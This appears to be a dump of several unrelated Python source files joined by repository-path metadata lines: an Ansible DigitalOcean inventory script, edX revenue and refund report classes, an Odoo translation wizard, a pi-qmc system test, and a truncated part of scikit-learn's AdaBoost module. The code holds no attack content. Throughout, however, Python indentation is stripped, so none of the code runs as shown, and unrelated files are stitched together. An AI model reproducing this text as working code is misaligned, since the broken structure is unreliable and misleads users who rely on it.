# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
######################################################################
import os
import sys
import re
import argparse
from time import time
import ConfigParser
try:
import json
except ImportError:
import simplejson as json
try:
from dopy.manager import DoError, DoManager
except ImportError, e:
print "failed=True msg='`dopy` library required for this script'"
sys.exit(1)
class DigitalOceanInventory(object):
###########################################################################
# Main execution path
###########################################################################
def __init__(self):
''' Main execution path '''
# DigitalOceanInventory data
self.data = {} # All DigitalOcean data
self.inventory = {} # Ansible Inventory
# Define defaults
self.cache_path = '.'
self.cache_max_age = 0
# Read settings, environment variables, and CLI arguments
self.read_settings()
self.read_environment()
self.read_cli_args()
# Verify credentials were set
if not hasattr(self, 'api_token'):
print '''Could not find values for DigitalOcean api_token.
They must be specified via either ini file, command line argument (--api-token),
or environment variables (DO_API_TOKEN)'''
sys.exit(-1)
# env command, show DigitalOcean credentials
if self.args.env:
print "DO_API_TOKEN=%s" % self.api_token
sys.exit(0)
# Manage cache
self.cache_filename = self.cache_path + "/ansible-digital_ocean.cache"
self.cache_refreshed = False
if self.is_cache_valid:
self.load_from_cache()
if len(self.data) == 0:
if self.args.force_cache:
print '''Cache is empty and --force-cache was specified'''
sys.exit(-1)
self.manager = DoManager(None, self.api_token, api_version=2)
# Pick the json_data to print based on the CLI command
if self.args.droplets:
self.load_from_digital_ocean('droplets')
json_data = {'droplets': self.data['droplets']}
elif self.args.regions:
self.load_from_digital_ocean('regions')
json_data = {'regions': self.data['regions']}
elif self.args.images:
self.load_from_digital_ocean('images')
json_data = {'images': self.data['images']}
elif self.args.sizes:
self.load_from_digital_ocean('sizes')
json_data = {'sizes': self.data['sizes']}
elif self.args.ssh_keys:
self.load_from_digital_ocean('ssh_keys')
json_data = {'ssh_keys': self.data['ssh_keys']}
elif self.args.domains:
self.load_from_digital_ocean('domains')
json_data = {'domains': self.data['domains']}
elif self.args.all:
self.load_from_digital_ocean()
json_data = self.data
elif self.args.host:
json_data = self.load_droplet_variables_for_host()
else: # '--list' this is last to make it default
self.load_from_digital_ocean('droplets')
self.build_inventory()
json_data = self.inventory
if self.cache_refreshed:
self.write_to_cache()
if self.args.pretty:
print json.dumps(json_data, sort_keys=True, indent=2)
else:
print json.dumps(json_data)
# That's all she wrote...
###########################################################################
# Script configuration
###########################################################################
def read_settings(self):
''' Reads the settings from the digital_ocean.ini file '''
config = ConfigParser.SafeConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/digital_ocean.ini')
# Credentials
if config.has_option('digital_ocean', 'api_token'):
self.api_token = config.get('digital_ocean', 'api_token')
# Cache related
if config.has_option('digital_ocean', 'cache_path'):
self.cache_path = config.get('digital_ocean', 'cache_path')
if config.has_option('digital_ocean', 'cache_max_age'):
self.cache_max_age = config.getint('digital_ocean', 'cache_max_age')
def read_environment(self):
''' Reads the settings from environment variables '''
# Setup credentials
if os.getenv("DO_API_TOKEN"):
self.api_token = os.getenv("DO_API_TOKEN")
if os.getenv("DO_API_KEY"):
self.api_token = os.getenv("DO_API_KEY")
def read_cli_args(self):
''' Command line argument processing '''
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on DigitalOcean credentials')
parser.add_argument('--list', action='store_true', help='List all active Droplets as Ansible inventory (default: True)')
parser.add_argument('--host', action='store', help='Get all Ansible inventory variables about a specific Droplet')
parser.add_argument('--all', action='store_true', help='List all DigitalOcean information as JSON')
parser.add_argument('--droplets','-d', action='store_true', help='List Droplets as JSON')
parser.add_argument('--regions', action='store_true', help='List Regions as JSON')
parser.add_argument('--images', action='store_true', help='List Images as JSON')
parser.add_argument('--sizes', action='store_true', help='List Sizes as JSON')
parser.add_argument('--ssh-keys', action='store_true', help='List SSH keys as JSON')
parser.add_argument('--domains', action='store_true',help='List Domains as JSON')
parser.add_argument('--pretty','-p', action='store_true', help='Pretty-print results')
parser.add_argument('--cache-path', action='store', help='Path to the cache files (default: .)')
parser.add_argument('--cache-max_age', action='store', help='Maximum age of the cached items (default: 0)')
parser.add_argument('--force-cache', action='store_true', default=False, help='Only use data from the cache')
parser.add_argument('--refresh-cache','-r', action='store_true', default=False,
help='Force refresh of cache by making API requests to DigitalOcean (default: False - use cache files)')
parser.add_argument('--env','-e', action='store_true', help='Display DO_API_TOKEN')
parser.add_argument('--api-token','-a', action='store', help='DigitalOcean API Token')
self.args = parser.parse_args()
if self.args.api_token:
self.api_token = self.args.api_token
# Make --list default if none of the other commands are specified
if (not self.args.droplets and not self.args.regions and
not self.args.images and not self.args.sizes and
not self.args.ssh_keys and not self.args.domains and
not self.args.all and not self.args.host):
self.args.list = True
###########################################################################
# Data Management
###########################################################################
def load_from_digital_ocean(self, resource=None):
'''Get JSON from DigitalOcean API'''
if self.args.force_cache:
return
# We always get fresh droplets
if self.is_cache_valid() and not (resource=='droplets' or resource is None):
return
if self.args.refresh_cache:
resource=None
if resource == 'droplets' or resource is None:
self.data['droplets'] = self.manager.all_active_droplets()
self.cache_refreshed = True
if resource == 'regions' or resource is None:
self.data['regions'] = self.manager.all_regions()
self.cache_refreshed = True
if resource == 'images' or resource is None:
self.data['images'] = self.manager.all_images(filter=None)
self.cache_refreshed = True
if resource == 'sizes' or resource is None:
self.data['sizes'] = self.manager.sizes()
self.cache_refreshed = True
if resource == 'ssh_keys' or resource is None:
self.data['ssh_keys'] = self.manager.all_ssh_keys()
self.cache_refreshed = True
if resource == 'domains' or resource is None:
self.data['domains'] = self.manager.all_domains()
self.cache_refreshed = True
def build_inventory(self):
'''Build Ansible inventory of droplets'''
self.inventory = {}
# add all droplets by id and name
for droplet in self.data['droplets']:
#when using private_networking, the API reports the private one in "ip_address", which is useless. We need the public one for Ansible to work
if 'private_networking' in droplet['features']:
for net in droplet['networks']['v4']:
if net['type']=='public':
dest=net['ip_address']
else:
continue
else:
dest = droplet['ip_address']
self.inventory[droplet['id']] = [dest]
self.push(self.inventory, droplet['name'], dest)
self.push(self.inventory, 'region_' + droplet['region']['slug'], dest)
self.push(self.inventory, 'image_' + str(droplet['image']['id']), dest)
self.push(self.inventory, 'size_' + droplet['size']['slug'], dest)
image_slug = droplet['image']['slug']
if image_slug:
self.push(self.inventory, 'image_' + self.to_safe(image_slug), dest)
else:
image_name = droplet['image']['name']
if image_name:
self.push(self.inventory, 'image_' + self.to_safe(image_name), dest)
self.push(self.inventory, 'distro_' + self.to_safe(droplet['image']['distribution']), dest)
self.push(self.inventory, 'status_' + droplet['status'], dest)
def load_droplet_variables_for_host(self):
'''Generate a JSON response to a --host call'''
host = int(self.args.host)
droplet = self.manager.show_droplet(host)
# Put all the information in a 'do_' namespace
info = {}
for k, v in droplet.items():
info['do_'+k] = v
return {'droplet': info}
###########################################################################
# Cache Management
###########################################################################
def is_cache_valid(self):
''' Determines if the cache files have expired, or if it is still valid '''
if os.path.isfile(self.cache_filename):
mod_time = os.path.getmtime(self.cache_filename)
current_time = time()
if (mod_time + self.cache_max_age) > current_time:
return True
return False
def load_from_cache(self):
''' Reads the data from the cache file and assigns it to member variables as Python Objects'''
try:
cache = open(self.cache_filename, 'r')
json_data = cache.read()
cache.close()
data = json.loads(json_data)
except IOError:
data = {'data': {}, 'inventory': {}}
self.data = data['data']
self.inventory = data['inventory']
def write_to_cache(self):
''' Writes data in JSON format to a file '''
data = { 'data': self.data, 'inventory': self.inventory }
json_data = json.dumps(data, sort_keys=True, indent=2)
cache = open(self.cache_filename, 'w')
cache.write(json_data)
cache.close()
###########################################################################
# Utilities
###########################################################################
def push(self, my_dict, key, element):
''' Pushed an element onto an array that may not have been defined in the dict '''
if key in my_dict:
my_dict[key].append(element)
else:
my_dict[key] = [element]
def to_safe(self, word):
''' Converts 'bad' characters in a string to underscores so they can be used as Ansible groups '''
return re.sub("[^A-Za-z0-9\-\.]", "_", word)
###########################################################################
# Run the script
DigitalOceanInventory()
|
UQ-UQx/edx-platform_lti
|
refs/heads/master
|
lms/djangoapps/shoppingcart/reports.py
|
66
|
""" Objects and functions related to generating CSV reports """
from decimal import Decimal
import unicodecsv
from django.utils.translation import ugettext as _
from courseware.courses import get_course_by_id
from course_modes.models import CourseMode
from shoppingcart.models import CertificateItem, OrderItem
from student.models import CourseEnrollment
from util.query import use_read_replica_if_available
from xmodule.modulestore.django import modulestore
class Report(object):
"""
Base class for making CSV reports related to revenue, enrollments, etc
To make a different type of report, write a new subclass that implements
the methods rows and header.
"""
def __init__(self, start_date, end_date, start_word=None, end_word=None):
self.start_date = start_date
self.end_date = end_date
self.start_word = start_word
self.end_word = end_word
def rows(self):
"""
Performs database queries necessary for the report and eturns an generator of
lists, in which each list is a separate row of the report.
Arguments are start_date (datetime), end_date (datetime), start_word (str),
and end_word (str). Date comparisons are start_date <= [date of item] < end_date.
"""
raise NotImplementedError
def header(self):
"""
Returns the appropriate header based on the report type, in the form of a
list of strings.
"""
raise NotImplementedError
def write_csv(self, filelike):
"""
Given a file object to write to and {start/end date, start/end letter} bounds,
generates a CSV report of the appropriate type.
"""
items = self.rows()
writer = unicodecsv.writer(filelike, encoding="utf-8")
writer.writerow(self.header())
for item in items:
writer.writerow(item)
class RefundReport(Report):
"""
Subclass of Report, used to generate Refund Reports for finance purposes.
For each refund between a given start_date and end_date, we find the relevant
order number, customer name, date of transaction, date of refund, and any service
fees.
"""
def rows(self):
query1 = use_read_replica_if_available(
CertificateItem.objects.select_related('user__profile').filter(
status="refunded",
refund_requested_time__gte=self.start_date,
refund_requested_time__lt=self.end_date,
).order_by('refund_requested_time'))
query2 = use_read_replica_if_available(
CertificateItem.objects.select_related('user__profile').filter(
status="refunded",
refund_requested_time=None,
))
query = query1 | query2
for item in query:
yield [
item.order_id,
item.user.profile.name,
item.fulfilled_time,
item.refund_requested_time,
item.line_cost,
item.service_fee,
]
def header(self):
return [
_("Order Number"),
_("Customer Name"),
_("Date of Original Transaction"),
_("Date of Refund"),
_("Amount of Refund"),
_("Service Fees (if any)"),
]
class ItemizedPurchaseReport(Report):
"""
Subclass of Report, used to generate itemized purchase reports.
For all purchases (verified certificates, paid course registrations, etc) between
a given start_date and end_date, we find that purchase's time, order ID, status,
quantity, unit cost, total cost, currency, description, and related comments.
"""
def rows(self):
query = use_read_replica_if_available(
OrderItem.objects.filter(
status="purchased",
fulfilled_time__gte=self.start_date,
fulfilled_time__lt=self.end_date,
).order_by("fulfilled_time"))
for item in query:
yield [
item.fulfilled_time,
item.order_id, # pylint: disable=no-member
item.status,
item.qty,
item.unit_cost,
item.line_cost,
item.currency,
item.line_desc,
item.report_comments,
]
def header(self):
return [
_("Purchase Time"),
_("Order ID"),
_("Status"),
_("Quantity"),
_("Unit Cost"),
_("Total Cost"),
_("Currency"),
_("Description"),
_("Comments")
]
class CertificateStatusReport(Report):
"""
Subclass of Report, used to generate Certificate Status Reports for Ed Services.
For each course in each university whose name is within the range start_word and end_word,
inclusive, (i.e., the letter range H-J includes both Ithaca College and Harvard University), we
calculate the total enrollment, audit enrollment, honor enrollment, verified enrollment, total
gross revenue, gross revenue over the minimum, and total dollars refunded.
"""
def rows(self):
for course_id in course_ids_between(self.start_word, self.end_word):
# If the first letter of the university is between start_word and end_word, then we include
# it in the report. These comparisons are unicode-safe.
cur_course = get_course_by_id(course_id)
university = cur_course.org
course = cur_course.number + " " + cur_course.display_name_with_default # TODO add term (i.e. Fall 2013)?
counts = CourseEnrollment.enrollment_counts(course_id)
total_enrolled = counts['total']
audit_enrolled = counts['audit']
honor_enrolled = counts['honor']
if counts['verified'] == 0:
verified_enrolled = 0
gross_rev = Decimal(0.00)
gross_rev_over_min = Decimal(0.00)
else:
verified_enrolled = counts['verified']
gross_rev = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'purchased', 'unit_cost')
gross_rev_over_min = gross_rev - (CourseMode.min_course_price_for_verified_for_currency(course_id, 'usd') * verified_enrolled)
num_verified_over_the_minimum = CertificateItem.verified_certificates_contributing_more_than_minimum(course_id)
# should I be worried about is_active here?
number_of_refunds = CertificateItem.verified_certificates_count(course_id, 'refunded')
if number_of_refunds == 0:
dollars_refunded = Decimal(0.00)
else:
dollars_refunded = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'refunded', 'unit_cost')
course_announce_date = ""
course_reg_start_date = ""
course_reg_close_date = ""
registration_period = ""
yield [
university,
course,
course_announce_date,
course_reg_start_date,
course_reg_close_date,
registration_period,
total_enrolled,
audit_enrolled,
honor_enrolled,
verified_enrolled,
gross_rev,
gross_rev_over_min,
num_verified_over_the_minimum,
number_of_refunds,
dollars_refunded
]
def header(self):
return [
_("University"),
_("Course"),
_("Course Announce Date"),
_("Course Start Date"),
_("Course Registration Close Date"),
_("Course Registration Period"),
_("Total Enrolled"),
_("Audit Enrollment"),
_("Honor Code Enrollment"),
_("Verified Enrollment"),
_("Gross Revenue"),
_("Gross Revenue over the Minimum"),
_("Number of Verified Students Contributing More than the Minimum"),
_("Number of Refunds"),
_("Dollars Refunded"),
]
class UniversityRevenueShareReport(Report):
"""
Subclass of Report, used to generate University Revenue Share Reports for finance purposes.
For each course in each university whose name is within the range start_word and end_word,
inclusive, (i.e., the letter range H-J includes both Ithaca College and Harvard University), we calculate
the total revenue generated by that particular course. This includes the number of transactions,
total payments collected, service fees, number of refunds, and total amount of refunds.
"""
def rows(self):
for course_id in course_ids_between(self.start_word, self.end_word):
cur_course = get_course_by_id(course_id)
university = cur_course.org
course = cur_course.number + " " + cur_course.display_name_with_default
total_payments_collected = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'purchased', 'unit_cost')
service_fees = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'purchased', 'service_fee')
num_refunds = CertificateItem.verified_certificates_count(course_id, "refunded")
amount_refunds = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'refunded', 'unit_cost')
num_transactions = (num_refunds * 2) + CertificateItem.verified_certificates_count(course_id, "purchased")
yield [
university,
course,
num_transactions,
total_payments_collected,
service_fees,
num_refunds,
amount_refunds
]
def header(self):
return [
_("University"),
_("Course"),
_("Number of Transactions"),
_("Total Payments Collected"),
_("Service Fees (if any)"),
_("Number of Successful Refunds"),
_("Total Amount of Refunds"),
]
def course_ids_between(start_word, end_word):
"""
Returns a list of all valid course_ids that fall alphabetically between start_word and end_word.
These comparisons are unicode-safe.
"""
valid_courses = []
for course in modulestore().get_courses():
course_id = course.id.to_deprecated_string()
if start_word.lower() <= course_id.lower() <= end_word.lower():
valid_courses.append(course.id)
return valid_courses
|
guerrerocarlos/odoo
|
refs/heads/8.0
|
openerp/addons/base/module/wizard/base_update_translations.py
|
447
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import cStringIO
from openerp import tools
from openerp.osv import osv, fields
from openerp.tools.translate import _
class base_update_translations(osv.osv_memory):
def _get_languages(self, cr, uid, context):
lang_obj = self.pool.get('res.lang')
ids = lang_obj.search(cr, uid, ['&', ('active', '=', True), ('translatable', '=', True),])
langs = lang_obj.browse(cr, uid, ids)
return [(lang.code, lang.name) for lang in langs]
def _get_lang_name(self, cr, uid, lang_code):
lang_obj = self.pool.get('res.lang')
ids = lang_obj.search(cr, uid, [('code', '=', lang_code)])
if not ids:
raise osv.except_osv(_('Error!'), _('No language with code "%s" exists') % lang_code)
lang = lang_obj.browse(cr, uid, ids[0])
return lang.name
def act_update(self, cr, uid, ids, context=None):
this = self.browse(cr, uid, ids)[0]
lang_name = self._get_lang_name(cr, uid, this.lang)
buf = cStringIO.StringIO()
tools.trans_export(this.lang, ['all'], buf, 'csv', cr)
tools.trans_load_data(cr, buf, 'csv', this.lang, lang_name=lang_name)
buf.close()
return {'type': 'ir.actions.act_window_close'}
def default_get(self, cr, uid, fields, context=None):
if context is None:
context = {}
res = super(base_update_translations, self).default_get(cr, uid, fields, context=context)
if context.get('active_model') != "res.lang":
return res
record_id = context.get('active_id', False) or False
if record_id:
lang = self.pool.get('res.lang').browse(cr, uid, record_id).code
res.update(lang=lang)
return res
_name = 'base.update.translations'
_columns = {
'lang': fields.selection(_get_languages, 'Language', required=True),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
phys-tools/pi-qmc
|
refs/heads/master
|
test/system/sho/test_sho.py
|
1
|
import unittest
import subprocess
import os
import pitools
import math
class SHOTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
os.chdir("sho")
out = file("pi.log", "w")
process = subprocess.Popen("../../../bin/pi-qmc",
stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
process.wait()
cls.h5file = pitools.openFile()
@classmethod
def tearDownClass(cls):
cls.h5file.close()
os.chdir("..")
def test_energy(self):
energy = self.h5file.getScalar("thermo_energy")
e, de = energy.getAverage()
expect = 0.75/math.tanh(0.25), 0.041
self.assertAlmostEqual(e, expect[0], delta=0.08, msg=
'wrong total energy, expected %f but got %f' % (expect[0], e))
self.assertAlmostEqual(de, expect[1], delta=0.01, msg=
'wrong error for energy, expected %f but got %f' % (expect[1], de))
|
eg-zhang/scikit-learn
|
refs/heads/master
|
sklearn/ensemble/weight_boosting.py
|
71
|
"""Weight Boosting
This module contains weight boosting estimators for both classification and
regression.
The module structure is the following:
- The ``BaseWeightBoosting`` base class implements a common ``fit`` method
for all the estimators in the module. Regression and classification
only differ from each other in the loss function that is optimized.
- ``AdaBoostClassifier`` implements adaptive boosting (AdaBoost-SAMME) for
classification problems.
- ``AdaBoostRegressor`` implements adaptive boosting (AdaBoost.R2) for
regression problems.
"""
# Authors: Noel Dawe <noel@dawe.me>
# Gilles Louppe <g.louppe@gmail.com>
# Hamzeh Alsalhi <ha258@cornell.edu>
# Arnaud Joly <arnaud.v.joly@gmail.com>
#
# Licence: BSD 3 clause
from abc import ABCMeta, abstractmethod
import numpy as np
from numpy.core.umath_tests import inner1d
from .base import BaseEnsemble
from ..base import ClassifierMixin, RegressorMixin
from ..externals import six
from ..externals.six.moves import zip
from ..externals.six.moves import xrange as range
from .forest import BaseForest
from ..tree import DecisionTreeClassifier, DecisionTreeRegressor
from ..tree.tree import BaseDecisionTree
from ..tree._tree import DTYPE
from ..utils import check_array, check_X_y, check_random_state
from ..metrics import accuracy_score, r2_score
from sklearn.utils.validation import has_fit_parameter, check_is_fitted
__all__ = [
'AdaBoostClassifier',
'AdaBoostRegressor',
]
class BaseWeightBoosting(six.with_metaclass(ABCMeta, BaseEnsemble)):
"""Base class for AdaBoost estimators.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator=None,
n_estimators=50,
estimator_params=tuple(),
learning_rate=1.,
random_state=None):
super(BaseWeightBoosting, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params)
self.learning_rate = learning_rate
self.random_state = random_state
def fit(self, X, y, sample_weight=None):
"""Build a boosted classifier/regressor from the training set (X, y).
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. COO, DOK, and LIL are converted to CSR. The dtype is
forced to DTYPE from tree._tree if the base classifier of this
ensemble weighted boosting classifier is a tree or forest.
y : array-like of shape = [n_samples]
The target values (class labels in classification, real numbers in
regression).
sample_weight : array-like of shape = [n_samples], optional
Sample weights. If None, the sample weights are initialized to
1 / n_samples.
Returns
-------
self : object
Returns self.
"""
# Check parameters
if self.learning_rate <= 0:
raise ValueError("learning_rate must be greater than zero")
if (self.base_estimator is None or
isinstance(self.base_estimator, (BaseDecisionTree,
BaseForest))):
dtype = DTYPE
accept_sparse = 'csc'
else:
dtype = None
accept_sparse = ['csr', 'csc']
X, y = check_X_y(X, y, accept_sparse=accept_sparse, dtype=dtype)
if sample_weight is None:
# Initialize weights to 1 / n_samples
sample_weight = np.empty(X.shape[0], dtype=np.float)
sample_weight[:] = 1. / X.shape[0]
else:
# Normalize existing weights
sample_weight = sample_weight / sample_weight.sum(dtype=np.float64)
# Check that the sample weights sum is positive
if sample_weight.sum() <= 0:
raise ValueError(
"Attempting to fit with a non-positive "
"weighted number of samples.")
# Check parameters
self._validate_estimator()
# Clear any previous fit results
self.estimators_ = []
self.estimator_weights_ = np.zeros(self.n_estimators, dtype=np.float)
self.estimator_errors_ = np.ones(self.n_estimators, dtype=np.float)
for iboost in range(self.n_estimators):
# Boosting step
sample_weight, estimator_weight, estimator_error = self._boost(
iboost,
X, y,
sample_weight)
# Early termination
if sample_weight is None:
break
self.estimator_weights_[iboost] = estimator_weight
self.estimator_errors_[iboost] = estimator_error
# Stop if error is zero
if estimator_error == 0:
break
sample_weight_sum = np.sum(sample_weight)
# Stop if the sum of sample weights has become non-positive
if sample_weight_sum <= 0:
break
if iboost < self.n_estimators - 1:
# Normalize
sample_weight /= sample_weight_sum
return self
@abstractmethod
def _boost(self, iboost, X, y, sample_weight):
"""Implement a single boost.
Warning: This method needs to be overriden by subclasses.
Parameters
----------
iboost : int
The index of the current boost iteration.
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. COO, DOK, and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (class labels).
sample_weight : array-like of shape = [n_samples]
The current sample weights.
Returns
-------
sample_weight : array-like of shape = [n_samples] or None
The reweighted sample weights.
If None then boosting has terminated early.
estimator_weight : float
The weight for the current boost.
If None then boosting has terminated early.
error : float
The classification error for the current boost.
If None then boosting has terminated early.
"""
pass
def staged_score(self, X, y, sample_weight=None):
"""Return staged scores for X, y.
This generator method yields the ensemble score after each iteration of
boosting and therefore allows monitoring, such as to determine the
score on a test set after each boost.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like, shape = [n_samples]
Labels for X.
sample_weight : array-like, shape = [n_samples], optional
Sample weights.
Returns
-------
z : float
"""
for y_pred in self.staged_predict(X):
if isinstance(self, ClassifierMixin):
yield accuracy_score(y, y_pred, sample_weight=sample_weight)
else:
yield r2_score(y, y_pred, sample_weight=sample_weight)
@property
def feature_importances_(self):
"""Return the feature importances (the higher, the more important the
feature).
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.estimators_ is None or len(self.estimators_) == 0:
raise ValueError("Estimator not fitted, "
"call `fit` before `feature_importances_`.")
try:
norm = self.estimator_weights_.sum()
return (sum(weight * clf.feature_importances_ for weight, clf
in zip(self.estimator_weights_, self.estimators_))
/ norm)
except AttributeError:
raise AttributeError(
"Unable to compute feature importances "
"since base_estimator does not have a "
"feature_importances_ attribute")
def _validate_X_predict(self, X):
"""Ensure that X is in the proper format"""
if (self.base_estimator is None or
isinstance(self.base_estimator,
(BaseDecisionTree, BaseForest))):
X = check_array(X, accept_sparse='csr', dtype=DTYPE)
else:
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
return X
def _samme_proba(estimator, n_classes, X):
"""Calculate algorithm 4, step 2, equation c) of Zhu et al [1].
References
----------
.. [1] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009.
"""
proba = estimator.predict_proba(X)
# Displace zero probabilities so the log is defined.
# Also fix negative elements which may occur with
# negative sample weights.
proba[proba < np.finfo(proba.dtype).eps] = np.finfo(proba.dtype).eps
log_proba = np.log(proba)
return (n_classes - 1) * (log_proba - (1. / n_classes)
* log_proba.sum(axis=1)[:, np.newaxis])
class AdaBoostClassifier(BaseWeightBoosting, ClassifierMixin):
"""An AdaBoost classifier.
An AdaBoost [1] classifier is a meta-estimator that begins by fitting a
classifier on the original dataset and then fits additional copies of the
classifier on the same dataset but where the weights of incorrectly
classified instances are adjusted such that subsequent classifiers focus
more on difficult cases.
This class implements the algorithm known as AdaBoost-SAMME [2].
Read more in the :ref:`User Guide <adaboost>`.
Parameters
----------
base_estimator : object, optional (default=DecisionTreeClassifier)
The base estimator from which the boosted ensemble is built.
Support for sample weighting is required, as well as proper `classes_`
and `n_classes_` attributes.
n_estimators : integer, optional (default=50)
The maximum number of estimators at which boosting is terminated.
In case of perfect fit, the learning procedure is stopped early.
learning_rate : float, optional (default=1.)
Learning rate shrinks the contribution of each classifier by
``learning_rate``. There is a trade-off between ``learning_rate`` and
``n_estimators``.
algorithm : {'SAMME', 'SAMME.R'}, optional (default='SAMME.R')
If 'SAMME.R' then use the SAMME.R real boosting algorithm.
``base_estimator`` must support calculation of class probabilities.
If 'SAMME' then use the SAMME discrete boosting algorithm.
The SAMME.R algorithm typically converges faster than SAMME,
achieving a lower test error with fewer boosting iterations.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
estimators_ : list of classifiers
The collection of fitted sub-estimators.
classes_ : array of shape = [n_classes]
The classes labels.
n_classes_ : int
The number of classes.
estimator_weights_ : array of floats
Weights for each estimator in the boosted ensemble.
estimator_errors_ : array of floats
Classification error for each estimator in the boosted
ensemble.
feature_importances_ : array of shape = [n_features]
The feature importances if supported by the ``base_estimator``.
See also
--------
AdaBoostRegressor, GradientBoostingClassifier, DecisionTreeClassifier
References
----------
.. [1] Y. Freund, R. Schapire, "A Decision-Theoretic Generalization of
on-Line Learning and an Application to Boosting", 1995.
.. [2] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009.
"""
def __init__(self,
base_estimator=None,
n_estimators=50,
learning_rate=1.,
algorithm='SAMME.R',
random_state=None):
super(AdaBoostClassifier, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
learning_rate=learning_rate,
random_state=random_state)
self.algorithm = algorithm
def fit(self, X, y, sample_weight=None):
"""Build a boosted classifier from the training set (X, y).
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (class labels).
sample_weight : array-like of shape = [n_samples], optional
Sample weights. If None, the sample weights are initialized to
``1 / n_samples``.
Returns
-------
self : object
Returns self.
"""
# Check that algorithm is supported
if self.algorithm not in ('SAMME', 'SAMME.R'):
raise ValueError("algorithm %s is not supported" % self.algorithm)
# Fit
return super(AdaBoostClassifier, self).fit(X, y, sample_weight)
def _validate_estimator(self):
"""Check the estimator and set the base_estimator_ attribute."""
super(AdaBoostClassifier, self)._validate_estimator(
default=DecisionTreeClassifier(max_depth=1))
# SAMME-R requires predict_proba-enabled base estimators
if self.algorithm == 'SAMME.R':
if not hasattr(self.base_estimator_, 'predict_proba'):
raise TypeError(
"AdaBoostClassifier with algorithm='SAMME.R' requires "
"that the weak learner supports the calculation of class "
"probabilities with a predict_proba method.\n"
"Please change the base estimator or set "
"algorithm='SAMME' instead.")
if not has_fit_parameter(self.base_estimator_, "sample_weight"):
raise ValueError("%s doesn't support sample_weight."
% self.base_estimator_.__class__.__name__)
def _boost(self, iboost, X, y, sample_weight):
"""Implement a single boost.
Perform a single boost according to the real multi-class SAMME.R
algorithm or to the discrete SAMME algorithm and return the updated
sample weights.
Parameters
----------
iboost : int
The index of the current boost iteration.
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (class labels).
sample_weight : array-like of shape = [n_samples]
The current sample weights.
Returns
-------
sample_weight : array-like of shape = [n_samples] or None
The reweighted sample weights.
If None then boosting has terminated early.
estimator_weight : float
The weight for the current boost.
If None then boosting has terminated early.
estimator_error : float
The classification error for the current boost.
If None then boosting has terminated early.
"""
if self.algorithm == 'SAMME.R':
return self._boost_real(iboost, X, y, sample_weight)
else: # elif self.algorithm == "SAMME":
return self._boost_discrete(iboost, X, y, sample_weight)
def _boost_real(self, iboost, X, y, sample_weight):
"""Implement a single boost using the SAMME.R real algorithm."""
estimator = self._make_estimator()
try:
estimator.set_params(random_state=self.random_state)
except ValueError:
pass
estimator.fit(X, y, sample_weight=sample_weight)
y_predict_proba = estimator.predict_proba(X)
if iboost == 0:
self.classes_ = getattr(estimator, 'classes_', None)
self.n_classes_ = len(self.classes_)
y_predict = self.classes_.take(np.argmax(y_predict_proba, axis=1),
axis=0)
# Instances incorrectly classified
incorrect = y_predict != y
# Error fraction
estimator_error = np.mean(
np.average(incorrect, weights=sample_weight, axis=0))
# Stop if classification is perfect
if estimator_error <= 0:
return sample_weight, 1., 0.
# Construct y coding as described in Zhu et al [2]:
#
# y_k = 1 if c == k else -1 / (K - 1)
#
# where K == n_classes_ and c, k in [0, K) are indices along the second
# axis of the y coding with c being the index corresponding to the true
# class label.
n_classes = self.n_classes_
classes = self.classes_
